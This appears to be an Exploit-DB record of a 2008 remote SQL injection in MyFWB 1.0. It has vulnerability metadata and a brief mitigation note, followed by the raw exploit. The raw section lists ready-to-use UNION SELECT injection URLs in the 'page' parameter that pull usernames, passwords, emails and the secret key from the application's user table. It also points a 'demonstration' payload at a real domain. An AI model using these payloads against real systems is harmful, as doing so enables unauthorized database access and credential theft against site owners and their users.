MyFWB 1.0 Remote SQL Injection

vendor:

MyFWB

by:

0x90

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MyFWB

Affected Version From: 1

Affected Version To: 1

Patch Exists: Yes

Related CWE: N/A

CPE: a:myfwb:myfwb:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MyFWB 1.0 Remote SQL Injection

MyFWB 1.0 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability to gain access to the username, password, email and secret key of the application. The exploit can be triggered by sending a specially crafted HTTP request to the vulnerable application. The request contains a malicious SQL query in the 'page' parameter of the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

MyFWB 1.0 Remote SQL Injection

Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar


Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user

Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user

Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user

Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user




Online Demostration:

http://myfwb.co.cc/?page=-0x90+union+select+0,0,secret,0+from+user

# milw0rm.com [2008-09-20]